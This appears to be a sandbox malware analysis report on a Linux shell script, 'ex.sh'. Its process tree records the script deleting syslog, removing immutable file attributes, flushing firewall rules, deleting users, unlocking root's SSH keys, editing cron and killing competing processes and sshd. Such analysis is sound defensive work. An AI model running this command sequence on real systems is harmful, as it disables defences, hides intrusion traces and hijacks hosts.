Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
127s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20221125-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20221125-enkernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
05/06/2023, 20:37
Static task
static1
Behavioral task
behavioral1
Sample
ex.sh
Resource
ubuntu1804-amd64-20221125-en
Behavioral task
behavioral2
Sample
ex.sh
Resource
debian9-armhf-en-20211208
Behavioral task
behavioral3
Sample
ex.sh
Resource
debian9-mipsbe-20221111-en
Behavioral task
behavioral4
Sample
ex.sh
Resource
debian9-mipsel-20221125-en
General
-
Target
ex.sh
-
Size
33KB
-
MD5
64cee920fe0de7406b82e77d2a050643
-
SHA1
4b9f0472a54a14fb88b67ce15d5771ee59c634eb
-
SHA256
3859228f749da18c65d0dab3f5efa45485967db2751a5a5ca604d06e5ff0607b
-
SHA512
5bfc29d014ed5746c015cf4e3695020e66192810227edfd589ab358022df0f8d25d24cd04aa3c3650f47fe6c8fcbe3a4bf05995f484fc8a259678755e8459320
-
SSDEEP
384:aAC6+7pQwKL//OMHDf6jlpTWg3vMGQiirhv6R+wMeWGj4CC9vEKMvU/4Qdre21j/:S7LzQ5VFNcDAFLcIwgnoYq0xFBrHtguz
Malware Config
Signatures
-
Deletes system logs 1 TTPs 1 IoCs
Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.
description ioc Process File deleted /var/log/syslog rm -
Flushes firewall rules 2 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 810 iptables 634 ufw -
ioc pid Process /lib/modules/4.15.0-161-generic/kernel/net/ipv6/netfilter/ip6_tables.ko 642 modprobe -
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 656 iptables 752 ip6tables 764 ip6tables 772 ip6tables 979 xargs 1019 xargs 660 iptables 845 xargs 949 xargs 1032 xargs 856 xargs 1023 xargs 997 xargs 633 chattr 770 ip6tables 824 xargs 836 xargs 868 xargs 955 xargs 973 xargs 1015 xargs 815 chattr 683 iptables 688 iptables 691 iptables 703 iptables 732 ip6tables 741 ip6tables 773 ip6tables 1027 xargs 631 chattr 690 iptables 768 ip6tables 967 xargs 1009 xargs 1036 xargs 657 iptables 767 ip6tables 771 ip6tables 796 ip6tables 632 chattr 655 iptables 671 iptables 687 iptables 715 iptables 784 ip6tables 804 ip6tables 925 xargs 937 xargs 961 xargs 991 xargs 651 iptables 659 iptables 830 xargs 640 ufw-init 739 ip6tables 838 grep 840 grep 850 xargs 630 chattr 723 iptables 737 ip6tables 740 ip6tables 874 xargs -
Creates/modifies Cron job 1 TTPs 11 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.J8yewm crontab File opened for modification /var/spool/cron/crontabs/tmp.WG2lZt crontab File opened for modification /var/spool/cron/crontabs/tmp.wMIKTv crontab File opened for modification /var/spool/cron/crontabs/tmp.ukMU4u crontab File opened for modification /var/spool/cron/crontabs/tmp.DVIMPx crontab File opened for modification /var/spool/cron/crontabs/tmp.i7Znqh crontab File opened for modification /var/spool/cron/crontabs/tmp.PUs9sp crontab File opened for modification /var/spool/cron/crontabs/tmp.5z7fCn crontab File opened for modification /var/spool/cron/crontabs/tmp.mxGZmr crontab File opened for modification /var/spool/cron/crontabs/tmp.5BZ5bt crontab File opened for modification /var/spool/cron/crontabs/tmp.v3WrHB crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes 1 TTPs 49 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/module/x_tables/initstate modprobe File opened for reading /sys/module/ip6_tables/initstate modprobe -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/5/cmdline pkill File opened for reading /proc/7/cmdline pkill File opened for reading /proc/18/cmdline pkill File opened for reading /proc/10/status pkill File opened for reading /proc/stat ps File opened for reading /proc/4/cmdline pkill File opened for reading /proc/176/cmdline pkill File opened for reading /proc/35/status pkill File opened for reading /proc/168/cmdline ps File opened for reading /proc/84/cmdline pkill File opened for reading /proc/626/status pkill File opened for reading /proc/373/cmdline pkill File opened for reading /proc/1/cmdline pkill File opened for reading /proc/179/cmdline pkill File opened for reading /proc/98/cmdline pkill File opened for reading /proc/368/cmdline ps File opened for reading /proc/31/cmdline ps File opened for reading /proc/312/status pkill File opened for reading /proc/1055/status pkill File opened for reading /proc/1/status pkill File opened for reading /proc/180/cmdline pkill File opened for reading /proc/81/cmdline pkill File opened for reading /proc/171/status pkill File opened for reading /proc/176/status pkill File opened for reading /proc/175/cmdline pkill File opened for reading /proc/sys/kernel/osrelease pkill File opened for reading /proc/19/cmdline pkill File opened for reading /proc/182/cmdline pkill File opened for reading /proc/78/status pkill File opened for reading /proc/11/cmdline pkill File opened for reading /proc/28/stat ps File opened for reading /proc/205/cmdline pkill File opened for reading /proc/10/cmdline pkill File opened for reading /proc/19/cmdline ps File opened for reading /proc/171/stat ps File opened for reading /proc/32/status pkill File opened for reading /proc/35/status pkill File opened for reading /proc/78/cmdline pkill File opened for reading /proc/393/status pkill File opened for reading /proc/5/status pkill File opened for reading /proc/171/cmdline pkill File opened for reading /proc/9/cmdline pkill File opened for reading /proc/166/cmdline pkill File opened for reading /proc/239/cmdline pkill File opened for reading /proc/469/cmdline pkill File opened for reading /proc/626/status pkill File opened for reading /proc/410/status pkill File opened for reading /proc/174/status pkill File opened for reading /proc/14/status pkill File opened for reading /proc/166/stat ps File opened for reading /proc/19/cmdline pkill File opened for reading /proc/167/cmdline pkill File opened for reading /proc/128/status pkill File opened for reading /proc/168/status pkill File opened for reading /proc/9/status pkill File opened for reading /proc/20/stat ps File opened for reading /proc/174/cmdline pkill File opened for reading /proc/14/cmdline pkill File opened for reading /proc/128/cmdline pkill File opened for reading /proc/368/status pkill File opened for reading /proc/169/cmdline pkill File opened for reading /proc/425/cmdline pkill File opened for reading /proc/20/status pkill File opened for reading /proc/10/cmdline pkill -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/log_rot ex.sh
Processes
-
/tmp/ex.sh/tmp/ex.sh1⤵
- Writes file to tmp directory
PID:628 -
/bin/rmrm -rf /var/log/syslog2⤵
- Deletes system logs
PID:629
-
-
/usr/bin/chattrchattr -iua /tmp/2⤵
- Attempts to change immutable files
PID:630
-
-
/usr/bin/chattrchattr -iua /var/tmp/2⤵
- Attempts to change immutable files
PID:631
-
-
/usr/bin/chattrchattr -R -i /var/spool/cron2⤵
- Attempts to change immutable files
PID:632
-
-
/usr/bin/chattrchattr -i /etc/crontab2⤵
- Attempts to change immutable files
PID:633
-
-
/usr/sbin/ufwufw disable2⤵
- Flushes firewall rules
PID:634 -
/sbin/iptables/sbin/iptables -V3⤵PID:635
-
-
/lib/ufw/ufw-init/lib/ufw/ufw-init force-stop3⤵
- Attempts to change immutable files
PID:640 -
/sbin/ip6tablesip6tables -L INPUT -n4⤵PID:641
-
/sbin/modprobe/sbin/modprobe ip6_tables5⤵
- Loads a kernel module
- Enumerates kernel/hardware configuration
PID:642
-
-
-
/sbin/iptablesiptables -F ufw-logging-deny4⤵PID:646
-
-
/sbin/iptablesiptables -F ufw-logging-allow4⤵PID:649
-
-
/sbin/iptablesiptables -F ufw-not-local4⤵PID:650
-
-
/sbin/iptablesiptables -F ufw-user-logging-input4⤵
- Attempts to change immutable files
PID:651
-
-
/sbin/iptablesiptables -F ufw-user-limit-accept4⤵PID:652
-
-
/sbin/iptablesiptables -F ufw-user-limit4⤵PID:653
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-input4⤵PID:654
-
-
/sbin/iptablesiptables -F ufw-reject-input4⤵
- Attempts to change immutable files
PID:655
-
-
/sbin/iptablesiptables -F ufw-after-logging-input4⤵
- Attempts to change immutable files
PID:656
-
-
/sbin/iptablesiptables -F ufw-after-input4⤵
- Attempts to change immutable files
PID:657
-
-
/sbin/iptablesiptables -F ufw-user-input4⤵PID:658
-
-
/sbin/iptablesiptables -F ufw-before-input4⤵
- Attempts to change immutable files
PID:659
-
-
/sbin/iptablesiptables -F ufw-before-logging-input4⤵
- Attempts to change immutable files
PID:660
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-forward4⤵PID:661
-
-
/sbin/iptablesiptables -F ufw-reject-forward4⤵PID:662
-
-
/sbin/iptablesiptables -F ufw-after-logging-forward4⤵PID:663
-
-
/sbin/iptablesiptables -F ufw-after-forward4⤵PID:664
-
-
/sbin/iptablesiptables -F ufw-user-logging-forward4⤵PID:665
-
-
/sbin/iptablesiptables -F ufw-user-forward4⤵PID:666
-
-
/sbin/iptablesiptables -F ufw-before-forward4⤵PID:667
-
-
/sbin/iptablesiptables -F ufw-before-logging-forward4⤵PID:668
-
-
/sbin/iptablesiptables -F ufw-track-forward4⤵PID:669
-
-
/sbin/iptablesiptables -F ufw-track-output4⤵PID:670
-
-
/sbin/iptablesiptables -F ufw-track-input4⤵
- Attempts to change immutable files
PID:671
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-output4⤵PID:672
-
-
/sbin/iptablesiptables -F ufw-reject-output4⤵PID:673
-
-
/sbin/iptablesiptables -F ufw-after-logging-output4⤵PID:674
-
-
/sbin/iptablesiptables -F ufw-after-output4⤵PID:675
-
-
/sbin/iptablesiptables -F ufw-user-logging-output4⤵PID:676
-
-
/sbin/iptablesiptables -F ufw-user-output4⤵PID:677
-
-
/sbin/iptablesiptables -F ufw-before-output4⤵PID:678
-
-
/sbin/iptablesiptables -F ufw-before-logging-output4⤵PID:679
-
-
/sbin/iptablesiptables -Z ufw-logging-deny4⤵PID:680
-
-
/sbin/iptablesiptables -Z ufw-logging-allow4⤵PID:681
-
-
/sbin/iptablesiptables -Z ufw-not-local4⤵PID:682
-
-
/sbin/iptablesiptables -Z ufw-user-logging-input4⤵
- Attempts to change immutable files
PID:683
-
-
/sbin/iptablesiptables -Z ufw-user-limit-accept4⤵PID:684
-
-
/sbin/iptablesiptables -Z ufw-user-limit4⤵PID:685
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-input4⤵PID:686
-
-
/sbin/iptablesiptables -Z ufw-reject-input4⤵
- Attempts to change immutable files
PID:687
-
-
/sbin/iptablesiptables -Z ufw-after-logging-input4⤵
- Attempts to change immutable files
PID:688
-
-
/sbin/iptablesiptables -Z ufw-after-input4⤵PID:689
-
-
/sbin/iptablesiptables -Z ufw-user-input4⤵
- Attempts to change immutable files
PID:690
-
-
/sbin/iptablesiptables -Z ufw-before-input4⤵
- Attempts to change immutable files
PID:691
-
-
/sbin/iptablesiptables -Z ufw-before-logging-input4⤵PID:692
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-forward4⤵PID:693
-
-
/sbin/iptablesiptables -Z ufw-reject-forward4⤵PID:694
-
-
/sbin/iptablesiptables -Z ufw-after-logging-forward4⤵PID:695
-
-
/sbin/iptablesiptables -Z ufw-after-forward4⤵PID:696
-
-
/sbin/iptablesiptables -Z ufw-user-logging-forward4⤵PID:697
-
-
/sbin/iptablesiptables -Z ufw-user-forward4⤵PID:698
-
-
/sbin/iptablesiptables -Z ufw-before-forward4⤵PID:699
-
-
/sbin/iptablesiptables -Z ufw-before-logging-forward4⤵PID:700
-
-
/sbin/iptablesiptables -Z ufw-track-forward4⤵PID:701
-
-
/sbin/iptablesiptables -Z ufw-track-output4⤵PID:702
-
-
/sbin/iptablesiptables -Z ufw-track-input4⤵
- Attempts to change immutable files
PID:703
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-output4⤵PID:704
-
-
/sbin/iptablesiptables -Z ufw-reject-output4⤵PID:705
-
-
/sbin/iptablesiptables -Z ufw-after-logging-output4⤵PID:706
-
-
/sbin/iptablesiptables -Z ufw-after-output4⤵PID:707
-
-
/sbin/iptablesiptables -Z ufw-user-logging-output4⤵PID:708
-
-
/sbin/iptablesiptables -Z ufw-user-output4⤵PID:709
-
-
/sbin/iptablesiptables -Z ufw-before-output4⤵PID:710
-
-
/sbin/iptablesiptables -Z ufw-before-logging-output4⤵PID:711
-
-
/sbin/iptablesiptables -X ufw-logging-deny4⤵PID:712
-
-
/sbin/iptablesiptables -X ufw-logging-allow4⤵PID:713
-
-
/sbin/iptablesiptables -X ufw-not-local4⤵PID:714
-
-
/sbin/iptablesiptables -X ufw-user-logging-input4⤵
- Attempts to change immutable files
PID:715
-
-
/sbin/iptablesiptables -X ufw-user-logging-output4⤵PID:716
-
-
/sbin/iptablesiptables -X ufw-user-logging-forward4⤵PID:717
-
-
/sbin/iptablesiptables -X ufw-user-limit-accept4⤵PID:718
-
-
/sbin/iptablesiptables -X ufw-user-limit4⤵PID:719
-
-
/sbin/iptablesiptables -X ufw-user-input4⤵PID:720
-
-
/sbin/iptablesiptables -X ufw-user-forward4⤵PID:721
-
-
/sbin/iptablesiptables -X ufw-user-output4⤵PID:722
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-input4⤵
- Attempts to change immutable files
PID:723
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-output4⤵PID:724
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-forward4⤵PID:725
-
-
/sbin/iptablesiptables -P INPUT ACCEPT4⤵PID:726
-
-
/sbin/iptablesiptables -P OUTPUT ACCEPT4⤵PID:727
-
-
/sbin/iptablesiptables -P FORWARD ACCEPT4⤵PID:728
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-deny4⤵PID:729
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-allow4⤵PID:730
-
-
/sbin/ip6tablesip6tables -F ufw6-not-local4⤵PID:731
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-input4⤵
- Attempts to change immutable files
PID:732
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit-accept4⤵PID:733
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit4⤵PID:734
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-input4⤵PID:735
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-input4⤵PID:736
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-input4⤵
- Attempts to change immutable files
PID:737
-
-
/sbin/ip6tablesip6tables -F ufw6-after-input4⤵PID:738
-
-
/sbin/ip6tablesip6tables -F ufw6-user-input4⤵
- Attempts to change immutable files
PID:739
-
-
/sbin/ip6tablesip6tables -F ufw6-before-input4⤵
- Attempts to change immutable files
PID:740
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-input4⤵
- Attempts to change immutable files
PID:741
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-forward4⤵PID:742
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-forward4⤵PID:743
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-forward4⤵PID:744
-
-
/sbin/ip6tablesip6tables -F ufw6-after-forward4⤵PID:745
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-forward4⤵PID:746
-
-
/sbin/ip6tablesip6tables -F ufw6-user-forward4⤵PID:747
-
-
/sbin/ip6tablesip6tables -F ufw6-before-forward4⤵PID:748
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-forward4⤵PID:749
-
-
/sbin/ip6tablesip6tables -F ufw6-track-forward4⤵PID:750
-
-
/sbin/ip6tablesip6tables -F ufw6-track-output4⤵PID:751
-
-
/sbin/ip6tablesip6tables -F ufw6-track-input4⤵
- Attempts to change immutable files
PID:752
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-output4⤵PID:753
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-output4⤵PID:754
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-output4⤵PID:755
-
-
/sbin/ip6tablesip6tables -F ufw6-after-output4⤵PID:756
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-output4⤵PID:757
-
-
/sbin/ip6tablesip6tables -F ufw6-user-output4⤵PID:758
-
-
/sbin/ip6tablesip6tables -F ufw6-before-output4⤵PID:759
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-output4⤵PID:760
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-deny4⤵PID:761
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-allow4⤵PID:762
-
-
/sbin/ip6tablesip6tables -Z ufw6-not-local4⤵PID:763
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-input4⤵
- Attempts to change immutable files
PID:764
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit-accept4⤵PID:765
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit4⤵PID:766
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-input4⤵
- Attempts to change immutable files
PID:767
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-input4⤵
- Attempts to change immutable files
PID:768
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-input4⤵PID:769
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-input4⤵
- Attempts to change immutable files
PID:770
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-input4⤵
- Attempts to change immutable files
PID:771
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-input4⤵
- Attempts to change immutable files
PID:772
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-input4⤵
- Attempts to change immutable files
PID:773
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-forward4⤵PID:774
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-forward4⤵PID:775
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-forward4⤵PID:776
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-forward4⤵PID:777
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-forward4⤵PID:778
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-forward4⤵PID:779
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-forward4⤵PID:780
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-forward4⤵PID:781
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-forward4⤵PID:782
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-output4⤵PID:783
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-input4⤵
- Attempts to change immutable files
PID:784
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-output4⤵PID:785
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-output4⤵PID:786
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-output4⤵PID:787
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-output4⤵PID:788
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-output4⤵PID:789
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-output4⤵PID:790
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-output4⤵PID:791
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-output4⤵PID:792
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-deny4⤵PID:793
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-allow4⤵PID:794
-
-
/sbin/ip6tablesip6tables -X ufw6-not-local4⤵PID:795
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-input4⤵
- Attempts to change immutable files
PID:796
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-output4⤵PID:797
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-forward4⤵PID:798
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit-accept4⤵PID:799
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit4⤵PID:800
-
-
/sbin/ip6tablesip6tables -X ufw6-user-input4⤵PID:801
-
-
/sbin/ip6tablesip6tables -X ufw6-user-forward4⤵PID:802
-
-
/sbin/ip6tablesip6tables -X ufw6-user-output4⤵PID:803
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-input4⤵
- Attempts to change immutable files
PID:804
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-output4⤵PID:805
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-forward4⤵PID:806
-
-
/sbin/ip6tablesip6tables -P INPUT ACCEPT4⤵PID:807
-
-
/sbin/ip6tablesip6tables -P OUTPUT ACCEPT4⤵PID:808
-
-
/sbin/ip6tablesip6tables -P FORWARD ACCEPT4⤵PID:809
-
-
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:810
-
-
/usr/bin/sudosudo sysctl "kernel.nmi_watchdog=0"2⤵PID:811
-
/sbin/sysctlsysctl "kernel.nmi_watchdog=0"3⤵PID:812
-
-
-
/usr/sbin/userdeluserdel akay2⤵PID:813
-
-
/usr/sbin/userdeluserdel vfinder2⤵PID:814
-
-
/usr/bin/chattrchattr -iae /root/.ssh/2⤵
- Attempts to change immutable files
PID:815
-
-
/usr/bin/chattrchattr -iae /root/.ssh/authorized_keys2⤵PID:816
-
-
/bin/rmrm -rf "/tmp/addres*"2⤵PID:817
-
-
/bin/rmrm -rf "/tmp/walle*"2⤵PID:818
-
-
/bin/rmrm -rf /tmp/keys2⤵PID:819
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:820
-
-
/bin/grepgrep /dot2⤵PID:821
-
-
/bin/grepgrep -v grep2⤵PID:822
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:823
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:824
-
-
/usr/bin/pkillpkill -f hezb2⤵
- Reads CPU attributes
PID:825
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:826
-
-
/bin/grepgrep tracepath2⤵PID:827
-
-
/bin/grepgrep -v grep2⤵PID:828
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:829
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:830
-
-
/usr/bin/pkillpkill -f /tmp/.out2⤵
- Reads CPU attributes
- Reads runtime system information
PID:831
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:832
-
-
/bin/grepgrep ./ll12⤵PID:833
-
-
/bin/grepgrep -v grep2⤵PID:834
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:835
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:836
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:837
-
-
/bin/grepgrep -i "[a]liyun"2⤵
- Attempts to change immutable files
PID:838
-
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:839
-
-
/bin/grepgrep -i "[y]unjing"2⤵
- Attempts to change immutable files
PID:840
-
-
/bin/grepgrep 185.71.65.2382⤵PID:842
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:843
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:844
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:845
-
-
/bin/grepgrep 140.82.52.872⤵PID:847
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:848
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:849
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:850
-
-
/bin/grepgrep 207.38.87.62⤵PID:852
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:853
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:854
-
-
/bin/grepgrep -v -2⤵PID:855
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:856
-
-
/bin/grepgrep 34.81.218.76:94862⤵PID:858
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:859
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:860
-
-
/bin/grepgrep -v -2⤵PID:861
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:862
-
-
/bin/grepgrep 42.112.28.216:94862⤵PID:864
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:865
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:866
-
-
/bin/grepgrep -v -2⤵PID:867
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:868
-
-
/usr/bin/pkillpkill -f .git/kthreaddw2⤵
- Reads CPU attributes
PID:869
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:870
-
-
/bin/grepgrep agetty2⤵PID:871
-
-
/bin/grepgrep -v grep2⤵PID:872
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:873
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:874
-
-
/usr/bin/pkillpkill -f 42.112.28.2162⤵
- Reads CPU attributes
- Reads runtime system information
PID:875
-
-
/usr/bin/crontabcrontab -l2⤵PID:876
-
-
/bin/sedsed /192.81.212.13/d2⤵PID:877
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:878
-
-
/usr/bin/crontabcrontab -l2⤵PID:879
-
-
/bin/sedsed /base64/d2⤵PID:880
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:881
-
-
/usr/bin/crontabcrontab -l2⤵PID:882
-
-
/bin/sedsed /python/d2⤵PID:883
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:884
-
-
/usr/bin/crontabcrontab -l2⤵PID:885
-
-
/bin/sedsed /shm/d2⤵PID:886
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:887
-
-
/usr/bin/crontabcrontab -l2⤵PID:888
-
-
/bin/sedsed /postgresql/d2⤵PID:889
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:890
-
-
/usr/bin/crontabcrontab -l2⤵PID:891
-
-
/bin/sedsed /cloudfronts/d2⤵PID:892
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:893
-
-
/usr/bin/crontabcrontab -l2⤵PID:894
-
-
/bin/sedsed /sshd/d2⤵PID:895
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:896
-
-
/usr/bin/crontabcrontab -l2⤵PID:897
-
-
/bin/sedsed /linux/d2⤵PID:898
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:899
-
-
/usr/bin/crontabcrontab -l2⤵PID:900
-
-
/bin/sedsed /neoogilvy/d2⤵PID:901
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:902
-
-
/usr/bin/crontabcrontab -l2⤵PID:903
-
-
/bin/sedsed /rsync/d2⤵PID:904
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:905
-
-
/usr/bin/crontabcrontab -l2⤵PID:906
-
-
/bin/sedsed /bpdeliver/d2⤵PID:907
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:908
-
-
/usr/bin/pkillpkill -f sshd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:909
-
-
/usr/bin/pkillpkill -f htop2⤵
- Reads CPU attributes
- Reads runtime system information
